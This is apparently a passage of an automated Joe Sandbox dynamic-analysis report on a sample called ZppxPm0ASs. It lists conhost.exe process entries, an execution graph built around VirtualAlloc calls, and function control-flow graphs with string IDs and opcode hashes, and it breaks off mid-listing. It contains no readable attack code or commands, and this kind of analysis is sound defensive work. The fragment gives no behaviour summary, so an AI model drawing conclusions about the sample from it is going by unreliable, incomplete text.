                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:31
                                                                                                                                Start time:09:40:07
                                                                                                                                Start date:16/12/2024
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff75da10000
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:32
                                                                                                                                Start time:09:40:07
                                                                                                                                Start date:16/12/2024
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff75da10000
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                Disassembly

                                                                                                                                Reset < >

                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage:7.2%
                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                  Signature Coverage:0%
                                                                                                                                  Total number of Nodes:20
                                                                                                                                  Total number of Limit Nodes:1
                                                                                                                                  execution_graph 29121 7ffaac46ed80 29124 7ffaac4697a0 29121->29124 29123 7ffaac46a94a 29124->29123 29125 7ffaac47aa20 29124->29125 29126 7ffaac47ad8d VirtualAlloc 29125->29126 29127 7ffaac47ade5 29126->29127 29127->29123 29132 7ffaac46b774 29133 7ffaac46b78e 29132->29133 29134 7ffaac46b96c 29133->29134 29137 7ffaac46b708 29133->29137 29142 7ffaac4696f0 VirtualAlloc 29134->29142 29136 7ffaac46b98e 29143 7ffaac469748 VirtualAlloc 29136->29143 29139 7ffaac46b9c0 29144 7ffaac469750 VirtualAlloc 29139->29144 29141 7ffaac46b927 29141->29137 29142->29136 29143->29139 29144->29141 29128 7ffaac469705 29129 7ffaac469708 29128->29129 29130 7ffaac47ad8d VirtualAlloc 29129->29130 29131 7ffaac47ade5 29130->29131

                                                                                                                                  Executed Functions

                                                                                                                                  Function 00007FFAAC62F135 Relevance: 7.0, Strings: 5, Instructions: 769COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 90 7ffaac62f135-7ffaac62f157 92 7ffaac62f16e-7ffaac62f22f call 7ffaac62ebc0 90->92 93 7ffaac62f159-7ffaac62f15c 90->93 104 7ffaac62f231-7ffaac62f270 call 7ffaac62ceb0 92->104 105 7ffaac62f294-7ffaac62f2a3 92->105 93->92 95 7ffaac62f15e-7ffaac62f16d 93->95 116 7ffaac62f275-7ffaac62f27d call 7ffaac624678 104->116 108 7ffaac62f2a5-7ffaac62f2b9 105->108 109 7ffaac62f2d8-7ffaac62f2ed 105->109 112 7ffaac62f864-7ffaac62f869 109->112 113 7ffaac62f2f3-7ffaac62f306 109->113 113->112 115 7ffaac62f30c-7ffaac62f32a 113->115 121 7ffaac62f32c-7ffaac62f351 115->121 122 7ffaac62f2cf-7ffaac62f2d7 115->122 120 7ffaac62f282-7ffaac62f293 116->120 125 7ffaac62f36a-7ffaac62f496 call 7ffaac626300 call 7ffaac62ceb0 call 7ffaac6263c0 call 7ffaac6257c0 call 7ffaac62b900 121->125 126 7ffaac62f353-7ffaac62f363 call 7ffaac626300 121->126 122->109 122->112 148 7ffaac62f49c-7ffaac62f4b3 125->148 149 7ffaac62f5e8-7ffaac62f616 call 7ffaac62a270 call 7ffaac629580 call 7ffaac624e20 125->149 126->125 153 7ffaac62f4cd-7ffaac62f4ea call 7ffaac6257c0 148->153 154 7ffaac62f4b5-7ffaac62f4c3 148->154 170 7ffaac62f618-7ffaac62f644 149->170 171 7ffaac62f646-7ffaac62f863 call 7ffaac628d50 call 7ffaac624e20 call 7ffaac62f86a call 7ffaac62f8b5 149->171 163 7ffaac62f4f0-7ffaac62f548 call 7ffaac624e20 call 7ffaac629c20 call 7ffaac6257c0 call 7ffaac629660 call 7ffaac6259f0 153->163 164 7ffaac62f705-7ffaac62f744 call 7ffaac624e20 call 7ffaac629c20 call 7ffaac6245f8 153->164 154->153 159 7ffaac62f4c5-7ffaac62f4cb 154->159 159->153 203 7ffaac62f68d-7ffaac62f6d6 163->203 204 7ffaac62f54e-7ffaac62f566 163->204 188 7ffaac62f770-7ffaac62f790 call 7ffaac624600 call 7ffaac6259f0 164->188 189 7ffaac62f746-7ffaac62f756 call 7ffaac6257c0 164->189 170->171 210 7ffaac62f5b9-7ffaac62f5e2 188->210 211 7ffaac62f796-7ffaac62f79a 188->211 200 7ffaac62f75c-7ffaac62f76e 189->200 201 7ffaac62f688-7ffaac62f689 189->201 200->188 200->189 201->203 231 7ffaac62f684 203->231 232 7ffaac62f6d8-7ffaac62f6fe 203->232 204->201 207 7ffaac62f56c-7ffaac62f5b4 call 7ffaac622ef0 call 7ffaac6263c0 call 7ffaac6259f0 204->207 207->210 210->148 210->149 211->201 214 7ffaac62f7a0-7ffaac62f836 call 7ffaac622ef0 call 7ffaac6263c0 call 7ffaac6259f0 211->214 214->211 238 7ffaac62f83c 214->238 231->201 232->164 238->210
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2892417721.00007FFAAC620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC620000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffaac620000_ZppxPm0ASs.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 6$P7[$b4$p7[$p7[
                                                                                                                                  • API String ID: 0-4150665655
                                                                                                                                  • Opcode ID: 98b3eb229d68d4b218731471a587305d595f3d9e13d722294f1e2d9e948bfe77
                                                                                                                                  • Instruction ID: 03f74e4135040ac0beb7b6b1b6b6c61b0d4c0108373a9ee23d02154869d58fe3
                                                                                                                                  • Opcode Fuzzy Hash: 98b3eb229d68d4b218731471a587305d595f3d9e13d722294f1e2d9e948bfe77
                                                                                                                                  • Instruction Fuzzy Hash: B1328730E1DA198FEB59EB28D455AA9B7E1FF59300F1091B9D04EC3296DE34EC468BC1
                                                                                                                                  Function 00007FFAAC6231F2 Relevance: 4.6, Strings: 3, Instructions: 888COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 720 7ffaac6231f2-7ffaac623264 725 7ffaac6232c5-7ffaac6232c9 720->725 726 7ffaac623266-7ffaac62329b call 7ffaac622e98 720->726 727 7ffaac6232cb-7ffaac6232d8 725->727 728 7ffaac6232da 725->728 726->725 730 7ffaac6232dc-7ffaac6232e5 727->730 728->730 733 7ffaac6232eb-7ffaac6232f0 730->733 734 7ffaac62341a-7ffaac62341f 730->734 738 7ffaac6232f6-7ffaac6232fb 733->738 739 7ffaac6238c8-7ffaac6238fa 733->739 736 7ffaac623421-7ffaac623433 734->736 737 7ffaac623485-7ffaac623489 734->737 753 7ffaac623438-7ffaac62343f 736->753 744 7ffaac62348b-7ffaac62349e 737->744 745 7ffaac6234d1-7ffaac6234fc 737->745 742 7ffaac6232fd-7ffaac623309 738->742 743 7ffaac62330f-7ffaac623415 call 7ffaac6203e0 call 7ffaac6209e0 738->743 749 7ffaac623901-7ffaac623933 739->749 742->743 742->749 782 7ffaac6238b4-7ffaac6238c7 743->782 757 7ffaac62393a-7ffaac623956 744->757 758 7ffaac6234a1-7ffaac6234af 744->758 771 7ffaac62350b 745->771 772 7ffaac6234fe-7ffaac623509 745->772 749->757 759 7ffaac623441-7ffaac623462 call 7ffaac622c90 753->759 760 7ffaac623435-7ffaac623436 753->760 783 7ffaac62395d-7ffaac6239ac 757->783 769 7ffaac6234b1-7ffaac6234cc call 7ffaac620a90 758->769 776 7ffaac623467-7ffaac623480 call 7ffaac622e58 759->776 760->753 769->782 777 7ffaac62350d-7ffaac62353c 771->777 772->777 776->782 786 7ffaac623542-7ffaac623561 777->786 787 7ffaac623739-7ffaac62373a 777->787 817 7ffaac6239b3-7ffaac6239f0 783->817 794 7ffaac623731-7ffaac623734 786->794 795 7ffaac623567-7ffaac62357e 786->795 791 7ffaac623741 787->791 796 7ffaac623746 791->796 798 7ffaac623636-7ffaac623638 794->798 807 7ffaac623580-7ffaac623595 795->807 808 7ffaac623597-7ffaac6235a1 795->808 799 7ffaac62374a-7ffaac62374c 796->799 803 7ffaac6236ed-7ffaac6236f6 798->803 804 7ffaac62363e-7ffaac62365d 798->804 805 7ffaac62374e-7ffaac623751 799->805 806 7ffaac623753-7ffaac623758 799->806 813 7ffaac6237ec-7ffaac6237f1 803->813 814 7ffaac6236fc-7ffaac623701 803->814 804->803 833 7ffaac623663-7ffaac62367a 804->833 809 7ffaac62378b-7ffaac62378e 805->809 811 7ffaac62375a-7ffaac623763 806->811 812 7ffaac623783-7ffaac623788 806->812 807->808 819 7ffaac6235a3-7ffaac6235cc 808->819 820 7ffaac6235d2-7ffaac6235d9 808->820 825 7ffaac6237df-7ffaac6237e6 809->825 826 7ffaac623790-7ffaac6237b9 809->826 811->812 812->809 821 7ffaac62383f-7ffaac6238ab call 7ffaac6209e0 813->821 822 7ffaac6237f3-7ffaac623817 813->822 815 7ffaac623703-7ffaac62370c 814->815 816 7ffaac623748 814->816 815->791 831 7ffaac62370e-7ffaac623713 815->831 816->799 854 7ffaac6239fb-7ffaac623a06 817->854 855 7ffaac6239f2-7ffaac6239f9 817->855 819->783 819->820 820->817 830 7ffaac6235df-7ffaac6235f6 820->830 849 7ffaac6238b0-7ffaac6238b1 821->849 846 7ffaac623837-7ffaac623838 822->846 847 7ffaac623819-7ffaac623830 822->847 825->813 825->814 844 7ffaac6237bb-7ffaac6237c1 826->844 845 7ffaac6237c2-7ffaac6237db 826->845 842 7ffaac623617-7ffaac623630 830->842 843 7ffaac6235f8-7ffaac623615 830->843 831->791 837 7ffaac623715-7ffaac62371a 831->837 856 7ffaac62367c-7ffaac623691 833->856 857 7ffaac623693-7ffaac62369a 833->857 837->791 848 7ffaac62371c-7ffaac623727 837->848 842->798 869 7ffaac623729-7ffaac62372c 842->869 843->842 844->845 845->825 846->821 847->846 848->796 849->782 855->854 861 7ffaac623a07-7ffaac623a34 855->861 856->857 857->817 859 7ffaac6236a0-7ffaac6236b6 857->859 863 7ffaac6236cf-7ffaac6236e7 859->863 864 7ffaac6236b8-7ffaac6236b9 859->864 863->803 863->833 870 7ffaac6236c0-7ffaac6236c8 864->870 869->795 870->863
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2892417721.00007FFAAC620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC620000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffaac620000_ZppxPm0ASs.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 6$b4$b4
                                                                                                                                  • API String ID: 0-1526618767
                                                                                                                                  • Opcode ID: fa36fa1b57ec3d683458703ba8f307e951c503d268c49d024522f498c65bf215
                                                                                                                                  • Instruction ID: 55c9671561d02b5152fbe013c5f4fcc7b59f4ef745618739dece859fec310841
                                                                                                                                  • Opcode Fuzzy Hash: fa36fa1b57ec3d683458703ba8f307e951c503d268c49d024522f498c65bf215
                                                                                                                                  • Instruction Fuzzy Hash: E752EF70A19B4A8FEB99DB2C8055675B7E1FF9A310F04A179D44EC3292EF34F8468781
                                                                                                                                  Function 00007FFAAC626C80 Relevance: 2.4, Strings: 1, Instructions: 1178COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2892417721.00007FFAAC620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC620000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffaac620000_ZppxPm0ASs.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 6
                                                                                                                                  • API String ID: 0-1452363761
                                                                                                                                  • Opcode ID: 069f5a50d5343f66d56d6c13ffe3a288f5ad51684d036df5fd8c7bc964060871
                                                                                                                                  • Instruction ID: d62ebee8bd0f38d87a777066adbe56dc1e9e7c71e76ab135e078c3bdda6cad44
                                                                                                                                  • Opcode Fuzzy Hash: 069f5a50d5343f66d56d6c13ffe3a288f5ad51684d036df5fd8c7bc964060871
                                                                                                                                  • Instruction Fuzzy Hash: 92820571A08A4A8FEB89EF2CC455AB9B7D1FF59300F145179E44EC7292DE24EC46CB81
                                                                                                                                  Function 00007FFAAC461415 Relevance: 1.6, Strings: 1, Instructions: 367COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2871016553.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffaac460000_ZppxPm0ASs.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: r6
                                                                                                                                  • API String ID: 0-2984296541
                                                                                                                                  • Opcode ID: 5594be0aa3ecf210048ea4f8ae50ac4840e3368f0fe8888defad2952644270ef
                                                                                                                                  • Instruction ID: 2e3cdb590d1f263dd7c668ebdbe815e4bfcae47989b2364aa938d339881edf5b
                                                                                                                                  • Opcode Fuzzy Hash: 5594be0aa3ecf210048ea4f8ae50ac4840e3368f0fe8888defad2952644270ef
                                                                                                                                  • Instruction Fuzzy Hash: 2AB1C531A099098FFB58EB58C459ABCB7E2EF99315F048179D00FC729ADE68EC458784
                                                                                                                                  Function 00007FFAAC63041D Relevance: 1.3, Instructions: 1298COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2892417721.00007FFAAC620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC620000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffaac620000_ZppxPm0ASs.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: dda01a15cc5985161ff1cbccc785d103eecf4625237141662e655f0de5a340e8
                                                                                                                                  • Instruction ID: e7797218097070f80c232c688f204c5084a67dc5503d7ce0d0bbdbd2618fc24b
                                                                                                                                  • Opcode Fuzzy Hash: dda01a15cc5985161ff1cbccc785d103eecf4625237141662e655f0de5a340e8
                                                                                                                                  • Instruction Fuzzy Hash: F6920730A0DA8A8FF75AD72884552B977E1EF96314F14A57DD04EC33D2DE28E84AC780
                                                                                                                                  Function 00007FFAAC460F08 Relevance: .1, Instructions: 147COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2871016553.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffaac460000_ZppxPm0ASs.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: e876f7ad852d832ee42c2eaa993dcea61ab8ac80d1efbe3d16a81a2b0bf9f78b
                                                                                                                                  • Instruction ID: f85ffb437f0b60859e2f8a98f11b67f9f039ed64c46be7e7aa6d335902083147
                                                                                                                                  • Opcode Fuzzy Hash: e876f7ad852d832ee42c2eaa993dcea61ab8ac80d1efbe3d16a81a2b0bf9f78b
                                                                                                                                  • Instruction Fuzzy Hash: 2941196184E3C64FE36A47740869172BFA4DF1312571981FFD4DAC6097E98C984BC3DA
                                                                                                                                  Function 00007FFAAC469705 Relevance: 8.2, APIs: 1, Strings: 4, Instructions: 748COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2871016553.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffaac460000_ZppxPm0ASs.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 6$H7$h7$p7
                                                                                                                                  • API String ID: 0-3096782379
                                                                                                                                  • Opcode ID: 4cb9a231843764d6ec0646c80843fc136734793bd076a9a16a5550fb3d2570fb
                                                                                                                                  • Instruction ID: e4a745cfda2023cac554f3f49878750aa51d19e2d6921a21d91ec0822f094ce4
                                                                                                                                  • Opcode Fuzzy Hash: 4cb9a231843764d6ec0646c80843fc136734793bd076a9a16a5550fb3d2570fb
                                                                                                                                  • Instruction Fuzzy Hash: CE42A37090978D8FEB85EF68C859AED7BF0FF55314F0041AAE40DD3292DA34A895CB81
                                                                                                                                  Function 00007FFAAC625EC5 Relevance: 6.5, Strings: 5, Instructions: 285COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2892417721.00007FFAAC620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC620000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffaac620000_ZppxPm0ASs.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: H:$H:$P:$W]H$X:
                                                                                                                                  • API String ID: 0-2971675312
                                                                                                                                  • Opcode ID: 0f5518328d92f83dd1c40b0495b3e2965e6d3d0713622d25b5e99ddc305925fd
                                                                                                                                  • Instruction ID: b6d5b8dcf55736cdcbb5d41cbd761275f2eff9a33383bf07923096e4218a126b
                                                                                                                                  • Opcode Fuzzy Hash: 0f5518328d92f83dd1c40b0495b3e2965e6d3d0713622d25b5e99ddc305925fd
                                                                                                                                  • Instruction Fuzzy Hash: 9291A374A19949CFEF99EF2CC495AA5B7E1FF69300B1450A8E40DC7296DE35EC42CB80
                                                                                                                                  Function 00007FFAAC469750 Relevance: 5.0, APIs: 1, Strings: 2, Instructions: 503memoryCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 627 7ffaac469750-7ffaac47a9eb 630 7ffaac47a9ed 627->630 631 7ffaac47a9f2-7ffaac47aa3b 627->631 630->631 634 7ffaac47aa3d 631->634 635 7ffaac47aa42-7ffaac47aa95 631->635 634->635 638 7ffaac47aa9c-7ffaac47aae9 635->638 639 7ffaac47aa97 635->639 642 7ffaac47aaf0-7ffaac47ab40 638->642 643 7ffaac47aaeb 638->643 639->638 646 7ffaac47ab47-7ffaac47abb8 call 7ffaac4698e8 642->646 647 7ffaac47ab42 642->647 643->642 651 7ffaac47abbf-7ffaac47abcd 646->651 652 7ffaac47abba 646->652 647->646 653 7ffaac47ac6e-7ffaac47ade3 VirtualAlloc 651->653 654 7ffaac47abd3-7ffaac47ac6d call 7ffaac478dd0 call 7ffaac469510 call 7ffaac46a480 651->654 652->651 668 7ffaac47adeb-7ffaac47ae4f 653->668 669 7ffaac47ade5 653->669 654->653 669->668
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2871016553.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffaac460000_ZppxPm0ASs.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                  • String ID: H7$p7
                                                                                                                                  • API String ID: 4275171209-3308921562
                                                                                                                                  • Opcode ID: 478b200b570a084b31e4a6bde98e0017f8abe14306e6f668fb37bead7f95de4d
                                                                                                                                  • Instruction ID: 063844955cc6f547f89e452025fb8cbd602ec29fae6295191cef51de2db667c5
                                                                                                                                  • Opcode Fuzzy Hash: 478b200b570a084b31e4a6bde98e0017f8abe14306e6f668fb37bead7f95de4d
                                                                                                                                  • Instruction Fuzzy Hash: 61F1AE7090978D8FDB85EF68C859AE97BF0FF5A310F0041AAE44DD3252DB34A995CB81
                                                                                                                                  Function 00007FFAAC469780 Relevance: 5.0, APIs: 1, Strings: 2, Instructions: 481memoryCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2871016553.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffaac460000_ZppxPm0ASs.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                  • String ID: H7$p7
                                                                                                                                  • API String ID: 4275171209-3308921562
                                                                                                                                  • Opcode ID: 9b72ef9120b9895d5520f306806483af6be466d08ccae520acb33c830015534c
                                                                                                                                  • Instruction ID: 1acc6a58b00ea947e043c3e6e6302c4b3963982854e110d13f5ba4c86a944a1d
                                                                                                                                  • Opcode Fuzzy Hash: 9b72ef9120b9895d5520f306806483af6be466d08ccae520acb33c830015534c
                                                                                                                                  • Instruction Fuzzy Hash: 01F18E7190978D8FDB85EF68C855AE97BF0FF5A310F0041AAE44DD3252DB34A895CB81
                                                                                                                                  Function 00007FFAAC62AF76 Relevance: 4.6, Strings: 3, Instructions: 806COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 875 7ffaac62af76-7ffaac62af82 880 7ffaac62afcc-7ffaac62afd5 875->880 881 7ffaac62af84-7ffaac62afb7 875->881 883 7ffaac62afdd 880->883 884 7ffaac62afd7 880->884 885 7ffaac62afe0-7ffaac62b0e2 call 7ffaac626210 call 7ffaac626300 call 7ffaac626830 883->885 886 7ffaac62afdf 883->886 884->883 899 7ffaac62b1e4-7ffaac62b251 call 7ffaac6257c0 * 2 call 7ffaac6259f0 885->899 900 7ffaac62b0e8-7ffaac62b0fb 885->900 886->885 929 7ffaac62b396-7ffaac62b3b4 call 7ffaac620a78 call 7ffaac62a270 899->929 930 7ffaac62b257-7ffaac62b26e 899->930 905 7ffaac62b0fd-7ffaac62b101 900->905 906 7ffaac62b153-7ffaac62b181 call 7ffaac6257c0 call 7ffaac624e20 call 7ffaac6245c0 900->906 905->899 908 7ffaac62b107-7ffaac62b123 905->908 923 7ffaac62b183-7ffaac62b19f 906->923 924 7ffaac62b1c6-7ffaac62b1df 906->924 908->899 918 7ffaac62b129-7ffaac62b14e 908->918 918->899 923->924 931 7ffaac62b1a1-7ffaac62b1be 923->931 924->899 943 7ffaac62b3ba-7ffaac62b48f call 7ffaac624e20 call 7ffaac628d50 call 7ffaac624500 call 7ffaac625710 call 7ffaac6263c0 call 7ffaac629c20 call 7ffaac6245e0 929->943 944 7ffaac62b713-7ffaac62b75e call 7ffaac628d50 929->944 937 7ffaac62b270-7ffaac62b27e 930->937 938 7ffaac62b288-7ffaac62b2a5 call 7ffaac6257c0 930->938 931->924 937->938 945 7ffaac62b280-7ffaac62b286 937->945 946 7ffaac62b2ab-7ffaac62b303 call 7ffaac624e20 call 7ffaac629c20 call 7ffaac6257c0 call 7ffaac629660 call 7ffaac6259f0 938->946 947 7ffaac62b5b9-7ffaac62b5bc 938->947 1024 7ffaac62b494-7ffaac62b4aa call 7ffaac620a78 943->1024 974 7ffaac62b763-7ffaac62b785 call 7ffaac62b786 call 7ffaac62b7d1 944->974 945->938 988 7ffaac62b541-7ffaac62b54c 946->988 989 7ffaac62b309-7ffaac62b327 946->989 953 7ffaac62b5bd-7ffaac62b5fe call 7ffaac624e20 call 7ffaac629c20 call 7ffaac6245f8 947->953 979 7ffaac62b604-7ffaac62b61d call 7ffaac6257c0 953->979 980 7ffaac62b707-7ffaac62b70e 953->980 995 7ffaac62b53c 979->995 997 7ffaac62b623-7ffaac62b637 979->997 984 7ffaac62b63d-7ffaac62b663 call 7ffaac624600 call 7ffaac6259f0 980->984 1009 7ffaac62b367-7ffaac62b390 984->1009 1010 7ffaac62b669-7ffaac62b674 984->1010 988->953 1000 7ffaac62b54e-7ffaac62b588 988->1000 989->995 996 7ffaac62b32d-7ffaac62b362 call 7ffaac620a68 989->996 995->988 996->1009 997->984 1002 7ffaac62b6fb-7ffaac62b702 997->1002 1000->947 1002->979 1009->929 1009->930 1010->995 1012 7ffaac62b67a-7ffaac62b6f0 call 7ffaac620a68 1010->1012 1012->1010 1028 7ffaac62b6f6 1012->1028 1030 7ffaac62b4ac-7ffaac62b4c8 1024->1030 1031 7ffaac62b4ef-7ffaac62b4f2 1024->1031 1028->1009 1030->1031 1038 7ffaac62b4ca-7ffaac62b4e7 1030->1038 1031->974 1033 7ffaac62b4f8-7ffaac62b50b call 7ffaac623088 1031->1033 1033->974 1037 7ffaac62b511-7ffaac62b537 call 7ffaac624e20 call 7ffaac624638 call 7ffaac6263c0 1033->1037 1037->974 1038->1031
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2892417721.00007FFAAC620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC620000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffaac620000_ZppxPm0ASs.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: X:$p=_H$t2_H
                                                                                                                                  • API String ID: 0-2047580285
                                                                                                                                  • Opcode ID: 47d406bf0783f28880a4f2cdc55f706be7a17c51d6c7c10543693cbcb7f06d68
                                                                                                                                  • Instruction ID: fd0bd6ba86a4cccf87c1da486a62a9c7ab12c3d0c6190680d5385a1be08da585
                                                                                                                                  • Opcode Fuzzy Hash: 47d406bf0783f28880a4f2cdc55f706be7a17c51d6c7c10543693cbcb7f06d68
                                                                                                                                  • Instruction Fuzzy Hash: 6742B530E1DA598FEB99EB2884557A9B7E1FF99300F1491B9D00EC3296DE34EC45CB81
                                                                                                                                  Function 00007FFAAC62AFB9 Relevance: 4.3, Strings: 3, Instructions: 526COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1046 7ffaac62afb9-7ffaac62afc7 1047 7ffaac62afca-7ffaac62afd5 1046->1047 1048 7ffaac62afc9 1046->1048 1050 7ffaac62afdd 1047->1050 1051 7ffaac62afd7 1047->1051 1048->1047 1052 7ffaac62afe0-7ffaac62b040 call 7ffaac626210 1050->1052 1053 7ffaac62afdf 1050->1053 1051->1050 1055 7ffaac62b045-7ffaac62b0e2 call 7ffaac626300 call 7ffaac626830 1052->1055 1053->1052 1066 7ffaac62b1e4-7ffaac62b224 call 7ffaac6257c0 * 2 call 7ffaac6259f0 1055->1066 1067 7ffaac62b0e8-7ffaac62b0fb 1055->1067 1084 7ffaac62b229-7ffaac62b22e 1066->1084 1072 7ffaac62b0fd-7ffaac62b101 1067->1072 1073 7ffaac62b153-7ffaac62b181 call 7ffaac6257c0 call 7ffaac624e20 call 7ffaac6245c0 1067->1073 1072->1066 1075 7ffaac62b107-7ffaac62b123 1072->1075 1090 7ffaac62b183-7ffaac62b19f 1073->1090 1091 7ffaac62b1c6-7ffaac62b1df 1073->1091 1075->1066 1085 7ffaac62b129-7ffaac62b14e 1075->1085 1089 7ffaac62b236-7ffaac62b251 1084->1089 1085->1066 1096 7ffaac62b396-7ffaac62b3b4 call 7ffaac620a78 call 7ffaac62a270 1089->1096 1097 7ffaac62b257-7ffaac62b26e 1089->1097 1090->1091 1098 7ffaac62b1a1-7ffaac62b1be 1090->1098 1091->1066 1110 7ffaac62b3ba-7ffaac62b480 call 7ffaac624e20 call 7ffaac628d50 call 7ffaac624500 call 7ffaac625710 call 7ffaac6263c0 call 7ffaac629c20 1096->1110 1111 7ffaac62b713-7ffaac62b75e call 7ffaac628d50 1096->1111 1104 7ffaac62b270-7ffaac62b27e 1097->1104 1105 7ffaac62b288-7ffaac62b2a5 call 7ffaac6257c0 1097->1105 1098->1091 1104->1105 1112 7ffaac62b280-7ffaac62b286 1104->1112 1113 7ffaac62b2ab-7ffaac62b303 call 7ffaac624e20 call 7ffaac629c20 